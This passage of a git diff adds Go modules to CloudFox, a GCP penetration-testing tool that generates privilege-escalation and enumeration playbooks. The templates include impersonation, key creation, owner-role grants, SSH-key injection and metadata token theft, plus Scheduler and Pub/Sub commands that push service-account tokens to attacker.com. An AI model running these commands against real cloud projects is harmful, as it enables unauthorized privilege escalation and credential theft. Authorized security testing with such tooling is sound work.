ProjectPSCEndpoints map[string][]networkendpointsservice.PrivateServiceConnectEndpoint // projectID -> endpoints + ProjectPrivateConnections map[string][]networkendpointsservice.PrivateConnection // projectID -> connections + ProjectServiceAttachments map[string][]networkendpointsservice.ServiceAttachment // projectID -> attachments + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PrivateServiceConnectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivateServiceConnectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivateServiceConnectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "private-service-connect") + if err != nil { + return + } + + module := &PrivateServiceConnectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPSCEndpoints: make(map[string][]networkendpointsservice.PrivateServiceConnectEndpoint), + ProjectPrivateConnections: make(map[string][]networkendpointsservice.PrivateConnection), + ProjectServiceAttachments: make(map[string][]networkendpointsservice.ServiceAttachment), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "private-service-connect", m.processProject) + + allEndpoints := m.getAllPSCEndpoints() + allConnections := m.getAllPrivateConnections() + allAttachments := m.getAllServiceAttachments() + + totalFindings := len(allEndpoints) + len(allConnections) + len(allAttachments) + + if totalFindings == 0 { + logger.InfoM("No private service connect endpoints found", "private-service-connect") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", + len(allEndpoints), len(allConnections), len(allAttachments)), "private-service-connect") + + // Count high-risk findings + autoAcceptCount := 0 + for _, sa := range allAttachments { + if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { + autoAcceptCount++ + } + } + if autoAcceptCount > 0 { + logger.InfoM(fmt.Sprintf("[High] %d service attachment(s) auto-accept connections from any project", autoAcceptCount), "private-service-connect") + } + + m.writeOutput(ctx, logger) +} + +func (m *PrivateServiceConnectModule) getAllPSCEndpoints() []networkendpointsservice.PrivateServiceConnectEndpoint { + var all []networkendpointsservice.PrivateServiceConnectEndpoint + for _, endpoints := range m.ProjectPSCEndpoints { + all = append(all, endpoints...) + } + return all +} + +func (m *PrivateServiceConnectModule) getAllPrivateConnections() []networkendpointsservice.PrivateConnection { + var all []networkendpointsservice.PrivateConnection + for _, conns := range m.ProjectPrivateConnections { + all = append(all, conns...) + } + return all +} + +func (m *PrivateServiceConnectModule) getAllServiceAttachments() []networkendpointsservice.ServiceAttachment { + var all []networkendpointsservice.ServiceAttachment + for _, attachments := range m.ProjectServiceAttachments { + all = append(all, attachments...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking private service connect in project: %s", projectID), "private-service-connect") + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["private-service-connect-commands"] = &internal.LootFile{ + Name: "private-service-connect-commands", + Contents: "# Private Service Connect Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n" + + "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", + } + } + m.mu.Unlock() + + svc := networkendpointsservice.New() + + // Get PSC endpoints + pscEndpoints, err := svc.GetPrivateServiceConnectEndpoints(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get PSC endpoints in project %s", projectID)) + } + + // Get private connections + privateConns, err := svc.GetPrivateConnections(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get private connections in project %s", projectID)) + } + + // Get service attachments + attachments, err := svc.GetServiceAttachments(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "private-service-connect", + fmt.Sprintf("Could not get service attachments in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPSCEndpoints[projectID] = append(m.ProjectPSCEndpoints[projectID], pscEndpoints...) + m.ProjectPrivateConnections[projectID] = append(m.ProjectPrivateConnections[projectID], privateConns...) + m.ProjectServiceAttachments[projectID] = append(m.ProjectServiceAttachments[projectID], attachments...) + + for _, endpoint := range pscEndpoints { + m.addPSCEndpointToLoot(projectID, endpoint) + } + for _, conn := range privateConns { + m.addPrivateConnectionToLoot(projectID, conn) + } + for _, attachment := range attachments { + m.addServiceAttachmentToLoot(projectID, attachment) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(projectID string, endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PSC ENDPOINT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Network: %s, Subnet: %s\n"+ + "# Target Type: %s, Target: %s\n"+ + "# State: %s, IP: %s\n\n", + endpoint.Name, endpoint.ProjectID, endpoint.Region, + endpoint.Network, endpoint.Subnetwork, + endpoint.TargetType, endpoint.Target, + endpoint.ConnectionState, endpoint.IPAddress, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Describe forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + endpoint.Name, endpoint.Region, endpoint.ProjectID, + ) + + if endpoint.IPAddress != "" { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Scan internal endpoint (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + endpoint.IPAddress, + ) + } +} + +func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(projectID string, conn networkendpointsservice.PrivateConnection) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PRIVATE CONNECTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Network: %s, Service: %s\n"+ + "# Peering: %s\n"+ + "# Reserved Ranges: %s\n"+ + "# Accessible Services: %s\n\n", + conn.Name, conn.ProjectID, + conn.Network, conn.Service, + conn.PeeringName, + reservedRanges, + accessibleServices, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# List private connections:\n"+ + "gcloud services vpc-peerings list --network=%s --project=%s\n\n", + conn.Network, conn.ProjectID, + ) + + // Add nmap commands for each reserved range + if len(conn.ReservedRanges) > 0 { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + } + for _, ipRange := range conn.ReservedRanges { + lootFile.Contents += fmt.Sprintf( + "# Scan private connection range (from within VPC):\n"+ + "nmap -sV -Pn %s\n\n", + ipRange, + ) + } +} + +func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(projectID string, attachment networkendpointsservice.ServiceAttachment) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } + natSubnets := "-" + if len(attachment.NatSubnets) > 0 { + natSubnets = strings.Join(attachment.NatSubnets, ", ") + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SERVICE ATTACHMENT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Target Service: %s\n"+ + "# Connection Preference: %s\n"+ + "# Connected Endpoints: %d\n"+ + "# NAT Subnets: %s\n", + attachment.Name, + attachment.ProjectID, attachment.Region, + attachment.TargetService, + attachment.ConnectionPreference, + attachment.ConnectedEndpoints, + natSubnets, + ) + + if len(attachment.ConsumerAcceptLists) > 0 { + lootFile.Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + } + if len(attachment.ConsumerRejectLists) > 0 { + lootFile.Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + } + + // Add IAM bindings info + if len(attachment.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range attachment.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += "\n# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Describe service attachment:\n"+ + "gcloud compute service-attachments describe %s --region=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud compute service-attachments get-iam-policy %s --region=%s --project=%s\n\n", + attachment.Name, attachment.Region, attachment.ProjectID, + attachment.Name, attachment.Region, attachment.ProjectID, + ) + + // If auto-accept, add exploitation command + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# [HIGH RISK] This service attachment accepts connections from ANY project!\n"+ + "# To connect from another project:\n"+ + "gcloud compute forwarding-rules create attacker-psc-endpoint \\\n"+ + " --region=%s \\\n"+ + " --network=ATTACKER_VPC \\\n"+ + " --address=RESERVED_IP \\\n"+ + " --target-service-attachment=projects/%s/regions/%s/serviceAttachments/%s\n\n", + attachment.Region, + attachment.ProjectID, attachment.Region, attachment.Name, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PrivateServiceConnectModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PrivateServiceConnectModule) getPSCEndpointsHeader() []string { + return []string{ + "Project", "Name", "Region", "Network", + "Subnet", "IP Address", "Target Type", "Target", "State", + } +} + +func (m *PrivateServiceConnectModule) getPrivateConnectionsHeader() []string { + return []string{ + "Project", "Name", "Network", "Service", + "Peering Name", "Reserved Ranges", "Accessible Services", + } +} + +func (m *PrivateServiceConnectModule) getServiceAttachmentsHeader() []string { + return []string{ + "Project", "Name", "Region", "Target Service", + "Accept Policy", "Connected", "NAT Subnets", "IAM Binding Role", "IAM Binding Principal", + } +} + +func (m *PrivateServiceConnectModule) pscEndpointsToTableBody(endpoints []networkendpointsservice.PrivateServiceConnectEndpoint) [][]string { + var body [][]string + for _, ep := range endpoints { + body = append(body, []string{ + m.GetProjectName(ep.ProjectID), ep.Name, ep.Region, + ep.Network, ep.Subnetwork, ep.IPAddress, ep.TargetType, ep.Target, ep.ConnectionState, + }) + } + return body +} + +func (m *PrivateServiceConnectModule) privateConnectionsToTableBody(conns []networkendpointsservice.PrivateConnection) [][]string { + var body [][]string + for _, conn := range conns { + reservedRanges := "-" + if len(conn.ReservedRanges) > 0 { + reservedRanges = strings.Join(conn.ReservedRanges, ", ") + } + accessibleServices := "-" + if len(conn.AccessibleServices) > 0 { + accessibleServices = strings.Join(conn.AccessibleServices, ", ") + } + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), conn.Name, conn.Network, + conn.Service, conn.PeeringName, reservedRanges, accessibleServices, + }) + } + return body +} + +func (m *PrivateServiceConnectModule) serviceAttachmentsToTableBody(attachments []networkendpointsservice.ServiceAttachment) [][]string { + var body [][]string + for _, att := range attachments { + natSubnets := "-" + if len(att.NatSubnets) > 0 { + natSubnets = strings.Join(att.NatSubnets, ", ") + } + if len(att.IAMBindings) > 0 { + for _, binding := range att.IAMBindings { + body = append(body, []string{ + m.GetProjectName(att.ProjectID), att.Name, att.Region, + att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), + natSubnets, binding.Role, binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(att.ProjectID), att.Name, att.Region, + att.TargetService, att.ConnectionPreference, fmt.Sprintf("%d", att.ConnectedEndpoints), + natSubnets, "-", "-", + }) + } + } + return body +} + +func (m *PrivateServiceConnectModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if eps, ok := m.ProjectPSCEndpoints[projectID]; ok && len(eps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "psc-endpoints", Header: m.getPSCEndpointsHeader(), Body: m.pscEndpointsToTableBody(eps), + }) + } + if conns, ok := m.ProjectPrivateConnections[projectID]; ok && len(conns) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "private-connections", Header: m.getPrivateConnectionsHeader(), Body: m.privateConnectionsToTableBody(conns), + }) + } + if atts, ok := m.ProjectServiceAttachments[projectID]; ok && len(atts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "service-attachments", Header: m.getServiceAttachmentsHeader(), Body: m.serviceAttachmentsToTableBody(atts), + }) + } + return tableFiles +} + +func (m *PrivateServiceConnectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectPSCEndpoints { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectPrivateConnections { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectServiceAttachments { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + outputData.ProjectLevelData[projectID] = PrivateServiceConnectOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), "private-service-connect") + } +} + +func (m *PrivateServiceConnectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allEndpoints := m.getAllPSCEndpoints() + if len(allEndpoints) > 0 { + tables = append(tables, internal.TableFile{ + Name: "psc-endpoints", Header: m.getPSCEndpointsHeader(), Body: m.pscEndpointsToTableBody(allEndpoints), + }) + } + + allConns := m.getAllPrivateConnections() + if len(allConns) > 0 { + tables = append(tables, internal.TableFile{ + Name: "private-connections", Header: m.getPrivateConnectionsHeader(), Body: m.privateConnectionsToTableBody(allConns), + }) + } + + allAtts := m.getAllServiceAttachments() + if len(allAtts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "service-attachments", Header: m.getServiceAttachmentsHeader(), Body: m.serviceAttachmentsToTableBody(allAtts), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := PrivateServiceConnectOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "private-service-connect") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go new file mode 100755 index 00000000..4bc819a9 --- /dev/null +++ b/gcp/commands/privesc.go @@ -0,0 +1,917 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPrivescCommand = &cobra.Command{ + Use: globals.GCP_PRIVESC_MODULE_NAME, + Aliases: []string{"pe", "escalate", "priv"}, + Short: "Identify privilege escalation paths in GCP organizations, folders, and projects", + Long: `Analyze FoxMapper graph data to identify privilege escalation opportunities. + +This module uses FoxMapper's graph-based analysis to find principals with paths +to admin-level access within the GCP environment. + +Prerequisites: +- Run 'foxmapper gcp graph create' first to generate the graph data + +Features: +- Identifies principals with privilege escalation paths to admin +- Shows shortest paths to organization, folder, and project admins +- Detects scope-limited paths (OAuth scope restrictions) +- Generates exploitation playbooks + +Detected privilege escalation vectors include: +- Service Account Token Creation (getAccessToken, getOpenIdToken) +- Service Account Key Creation (serviceAccountKeys.create) +- IAM Policy Modification (setIamPolicy) +- Compute Instance Creation with privileged SA +- Cloud Functions/Run deployment with SA +- And 60+ more techniques + +Run 'foxmapper gcp graph create' to generate the graph, then use this module.`, + Run: runGCPPrivescCommand, +} + +type PrivescModule struct { + gcpinternal.BaseGCPModule + + // FoxMapper data + FoxMapperCache *gcpinternal.FoxMapperCache + Findings []foxmapperservice.PrivescFinding + OrgCache *gcpinternal.OrgCache + + // Loot + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type PrivescOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PrivescOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PrivescOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPPrivescCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PRIVESC_MODULE_NAME) + if err != nil { + return + } + + module := &PrivescModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Findings: []foxmapperservice.PrivescFinding{}, + LootMap: make(map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing privilege escalation paths using FoxMapper...", globals.GCP_PRIVESC_MODULE_NAME) + + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + logger.ErrorM("No FoxMapper data found. Run 'foxmapper gcp graph create' first.", globals.GCP_PRIVESC_MODULE_NAME) + logger.InfoM("FoxMapper creates a graph of IAM relationships for accurate privesc analysis.", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + // Get the FoxMapper service and analyze privesc + svc := m.FoxMapperCache.GetService() + m.Findings = svc.AnalyzePrivesc() + + // Generate loot + m.generateLoot() + + if len(m.Findings) == 0 { + logger.InfoM("No privilege escalation paths found", globals.GCP_PRIVESC_MODULE_NAME) + return + } + + // Count statistics + adminCount := 0 + privescCount := 0 + orgReachable := 0 + folderReachable := 0 + projectReachable := 0 + + for _, f := range m.Findings { + if f.IsAdmin { + adminCount++ + } else if f.CanEscalate { + privescCount++ + if f.PathsToOrgAdmin > 0 { + orgReachable++ + } + if f.PathsToFolderAdmin > 0 { + folderReachable++ + } + if f.PathsToProjectAdmin > 0 { + projectReachable++ + } + } + } + + logger.SuccessM(fmt.Sprintf("Found %d admin(s) and %d principal(s) with privilege escalation paths", + adminCount, privescCount), globals.GCP_PRIVESC_MODULE_NAME) + + if privescCount > 0 { + logger.InfoM(fmt.Sprintf(" → %d can reach org admin, %d folder admin, %d project admin", + orgReachable, folderReachable, projectReachable), globals.GCP_PRIVESC_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *PrivescModule) generateLoot() { + // Loot is now generated per-project in writeHierarchicalOutput/writeFlatOutput +} + +// getPrivescExploitCommand returns specific exploitation commands for a privesc technique +// technique is the short reason, fullReason contains more details +func getPrivescExploitCommand(technique, fullReason, sourcePrincipal, targetPrincipal, project string) string { + // Clean target principal for use in commands + targetSA := targetPrincipal + if strings.HasPrefix(targetSA, "serviceAccount:") { + targetSA = strings.TrimPrefix(targetSA, "serviceAccount:") + } + if strings.HasPrefix(targetSA, "user:") { + targetSA = strings.TrimPrefix(targetSA, "user:") + } + + // Clean source principal + sourceSA := sourcePrincipal + if strings.HasPrefix(sourceSA, "serviceAccount:") { + sourceSA = strings.TrimPrefix(sourceSA, "serviceAccount:") + } + + // Combine technique and fullReason for matching + combinedLower := strings.ToLower(technique + " " + fullReason) + + switch { + // Service Account Token/Key Creation - most common privesc + case strings.Contains(combinedLower, "getaccesstoken") || strings.Contains(combinedLower, "generateaccesstoken") || + strings.Contains(combinedLower, "iam.serviceaccounts.getaccesstoken"): + return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", targetSA) + + case strings.Contains(combinedLower, "signblob") || strings.Contains(combinedLower, "iam.serviceaccounts.signblob"): + return fmt.Sprintf("gcloud iam service-accounts sign-blob --iam-account=%s input.txt output.sig", targetSA) + + case strings.Contains(combinedLower, "signjwt") || strings.Contains(combinedLower, "iam.serviceaccounts.signjwt"): + return fmt.Sprintf("gcloud iam service-accounts sign-jwt --iam-account=%s input.json output.jwt", targetSA) + + case strings.Contains(combinedLower, "serviceaccountkeys.create") || strings.Contains(combinedLower, "keys.create") || + strings.Contains(combinedLower, "iam.serviceaccountkeys.create"): + return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", targetSA) + + case strings.Contains(combinedLower, "generateidtoken") || strings.Contains(combinedLower, "openidtoken") || + strings.Contains(combinedLower, "iam.serviceaccounts.generateidtoken"): + return fmt.Sprintf("gcloud auth print-identity-token --impersonate-service-account=%s --audiences=https://example.com", targetSA) + + // Token Creator role - can impersonate + case strings.Contains(combinedLower, "tokencreator") || strings.Contains(combinedLower, "serviceaccounttokencreator"): + return fmt.Sprintf("# Has Token Creator role on target\ngcloud auth print-access-token --impersonate-service-account=%s", targetSA) + + // Service Account User role - can attach SA to resources + case strings.Contains(combinedLower, "serviceaccountuser") || strings.Contains(combinedLower, "actas") || + strings.Contains(combinedLower, "iam.serviceaccounts.actas"): + return fmt.Sprintf("# Has actAs permission - can attach this SA to compute resources\n# Option 1: Create VM with target SA\ngcloud compute instances create privesc-vm --service-account=%s --scopes=cloud-platform --zone=us-central1-a --project=%s\n\n# Option 2: Deploy Cloud Function with target SA\ngcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=%s --source=. --entry-point=main --project=%s", targetSA, project, targetSA, project) + + // Workload Identity - GKE pod can impersonate SA + case strings.Contains(combinedLower, "workload identity") || strings.Contains(combinedLower, "workloadidentity") || + strings.Contains(combinedLower, "gke") || strings.Contains(combinedLower, "kubernetes"): + return fmt.Sprintf("# Workload Identity binding - GKE pod can impersonate SA\n# From within the GKE pod:\ncurl -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/%s/token", targetSA) + + // IAM Policy Modification + case strings.Contains(combinedLower, "setiampolicy") || strings.Contains(combinedLower, "resourcemanager") || + strings.Contains(combinedLower, "iam.setiampolicy"): + if strings.Contains(combinedLower, "organization") || strings.Contains(combinedLower, "org") { + return fmt.Sprintf("# Can modify org IAM policy\ngcloud organizations add-iam-policy-binding ORG_ID --member=serviceAccount:%s --role=roles/owner", sourceSA) + } else if strings.Contains(combinedLower, "folder") { + return fmt.Sprintf("# Can modify folder IAM policy\ngcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=serviceAccount:%s --role=roles/owner", sourceSA) + } + return fmt.Sprintf("# Can modify project IAM policy\ngcloud projects add-iam-policy-binding %s --member=serviceAccount:%s --role=roles/owner", project, sourceSA) + + // Compute Instance Creation + case strings.Contains(combinedLower, "compute.instances.create") || strings.Contains(combinedLower, "create instance"): + return fmt.Sprintf("gcloud compute instances create privesc-vm --service-account=%s --scopes=cloud-platform --zone=us-central1-a --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "compute.instances.setserviceaccount"): + return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE_NAME --service-account=%s --scopes=cloud-platform --zone=ZONE --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "compute.instances.setmetadata") || strings.Contains(combinedLower, "ssh"): + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\" --zone=ZONE --project=%s", project) + + // Cloud Functions + case strings.Contains(combinedLower, "cloudfunctions.functions.create") || strings.Contains(combinedLower, "functions.create"): + return fmt.Sprintf("gcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=%s --source=. --entry-point=main --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "cloudfunctions.functions.update") || strings.Contains(combinedLower, "functions.update"): + return fmt.Sprintf("gcloud functions deploy FUNCTION_NAME --service-account=%s --project=%s", targetSA, project) + + // Cloud Run + case strings.Contains(combinedLower, "run.services.create") || strings.Contains(combinedLower, "cloudrun"): + return fmt.Sprintf("gcloud run deploy privesc-svc --image=gcr.io/%s/privesc-img --service-account=%s --region=us-central1 --project=%s", project, targetSA, project) + + case strings.Contains(combinedLower, "run.services.update"): + return fmt.Sprintf("gcloud run services update SERVICE_NAME --service-account=%s --region=REGION --project=%s", targetSA, project) + + // Cloud Scheduler + case strings.Contains(combinedLower, "cloudscheduler") || strings.Contains(combinedLower, "scheduler.jobs"): + return fmt.Sprintf("gcloud scheduler jobs create http privesc-job --schedule=\"* * * * *\" --uri=https://attacker.com/callback --oidc-service-account-email=%s --project=%s", targetSA, project) + + // Dataproc + case strings.Contains(combinedLower, "dataproc"): + return fmt.Sprintf("gcloud dataproc clusters create privesc-cluster --service-account=%s --region=us-central1 --project=%s", targetSA, project) + + // Composer + case strings.Contains(combinedLower, "composer"): + return fmt.Sprintf("gcloud composer environments create privesc-env --service-account=%s --location=us-central1 --project=%s", targetSA, project) + + // Workflows + case strings.Contains(combinedLower, "workflows"): + return fmt.Sprintf("gcloud workflows deploy privesc-workflow --source=workflow.yaml --service-account=%s --project=%s", targetSA, project) + + // Pub/Sub + case strings.Contains(combinedLower, "pubsub"): + return fmt.Sprintf("gcloud pubsub subscriptions create privesc-sub --topic=TOPIC --push-endpoint=https://attacker.com/endpoint --push-auth-service-account=%s --project=%s", targetSA, project) + + // Storage HMAC + case strings.Contains(combinedLower, "storage.hmackeys"): + return fmt.Sprintf("gsutil hmac create %s", targetSA) + + // Deployment Manager + case strings.Contains(combinedLower, "deploymentmanager"): + return fmt.Sprintf("gcloud deployment-manager deployments create privesc-deploy --config=deployment.yaml --project=%s", project) + + // API Keys + case strings.Contains(combinedLower, "apikeys"): + return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", project) + + // Org Policy + case strings.Contains(combinedLower, "orgpolicy"): + return fmt.Sprintf("gcloud org-policies set-policy policy.yaml --project=%s", project) + + // Generic IAM edge - likely token creator or actAs relationship + case strings.ToLower(technique) == "iam" || strings.Contains(combinedLower, "iam binding"): + // Check if target is a service account + if strings.Contains(targetSA, ".iam.gserviceaccount.com") || strings.Contains(targetSA, "@") { + return fmt.Sprintf("# IAM relationship allows impersonation of target SA\n# Try token generation:\ngcloud auth print-access-token --impersonate-service-account=%s\n\n# Or create SA key (if permitted):\ngcloud iam service-accounts keys create key.json --iam-account=%s", targetSA, targetSA) + } + return fmt.Sprintf("# IAM relationship to target principal\n# Check IAM bindings for specific permissions:\ngcloud iam service-accounts get-iam-policy %s", targetSA) + + default: + // Provide a helpful default with the most common privesc commands + if strings.Contains(targetSA, ".iam.gserviceaccount.com") { + return fmt.Sprintf("# %s\n# Target: %s\n\n# Try impersonation:\ngcloud auth print-access-token --impersonate-service-account=%s\n\n# Or create key:\ngcloud iam service-accounts keys create key.json --iam-account=%s", fullReason, targetSA, targetSA, targetSA) + } + return fmt.Sprintf("# %s\n# Target: %s", fullReason, targetSA) + } +} + +// writePrivescFindingToPlaybook writes a detailed privesc finding to the playbook +func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f foxmapperservice.PrivescFinding) { + // Get source principal's project + sourceProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + if sourceProject == "" { + sourceProject = "PROJECT" + } + + sb.WriteString(fmt.Sprintf("# %s (%s)\n", f.Principal, f.MemberType)) + confidenceNote := "" + if f.BestPathConfidence != "" && f.BestPathConfidence != "high" { + confidenceNote = fmt.Sprintf(" | 